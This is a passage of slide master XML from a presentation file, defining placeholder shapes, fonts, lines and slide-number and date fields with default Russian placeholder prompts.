            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{C75941B9-BAC8-42A5-A635-F32A1FC81562}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="74"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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21" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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1" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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232" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="75"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{B0908139-72E5-4383-89D4-A156E54D84E3}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="76"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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23" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster3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4" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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235" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674240" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="77"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{94C96CF4-AA10-48FF-8693-3DB5DDA6C60A}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="78"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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25"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 name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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22" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="142920"/>
            <a:ext cx="1206000" cy="1283760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8228880" cy="397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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{AC9B40EC-A9C9-414B-9527-752F556FCF18}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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5" r:id="rId3"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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3" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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244" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="79"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{C6A5205D-57FA-4CA6-8501-5F269636D547}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="80"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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27" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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247" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="81"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{BA7EFD9C-790D-4299-AD02-AC5F3A12CB7F}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="82"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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29" r:id="rId2"/>
  </p:sldLayoutIdLst>
</p:sldMaster>
</file>

<file path=ppt/slideMasters/slideMaster4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1" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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252" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="83"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{8286D00F-CB88-46D2-9143-C1C0E9229594}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="84"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
